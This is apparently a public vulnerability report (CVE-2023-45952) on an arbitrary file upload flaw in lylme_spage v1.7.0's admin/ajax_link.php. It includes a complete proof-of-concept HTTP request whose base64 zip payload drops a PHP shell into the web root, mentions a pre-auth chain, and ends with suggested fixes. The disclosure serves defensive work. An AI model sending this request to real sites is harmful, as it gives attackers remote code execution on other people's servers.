Headline
CVE-2023-45952: [vulnerability] Upload Shell Vulnerability in ajax_link.php · Issue #33 · LyLme/lylme_spage
An arbitrary file upload vulnerability in the component ajax_link.php of lylme_spage v1.7.0 allows attackers to execute arbitrary code via uploading a crafted file.
Upload Shell Vulnerability in ajax_link.php****1.Steps to reproduce
1.Access http://host/admin/ajax_link.php?submit=update via POST method and carry the follw data, the injection point is file field within HTTP Body.
Although this is a backend vulnerability, the Pre-Auth chain to upload shell can be implemented in conjunction with #32
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1 Host: host Connection: close Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ; Content-Type: application/x-www-form-urlencoded Content-Length: 198
file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2.After submit the request, the shell 1.php will be extracted to the ROOT dir.
2.Expected behaviour
The code snippet as shown meant to update system from zip compress package.
3.Actual behaviour
Howerver, audit the code depth, found that the extracted $RemoteFile can passed any malicious data, and then release to ROOT Dir via zipExtract function directlty.
4.Affected Version
this Vuln Affect latest Version: lylme_spagev1.7.0
5.fixes Recommendations
For fix this vuln, Here is my advices:
1.Delete this function point
2.Limit decompression file suffixes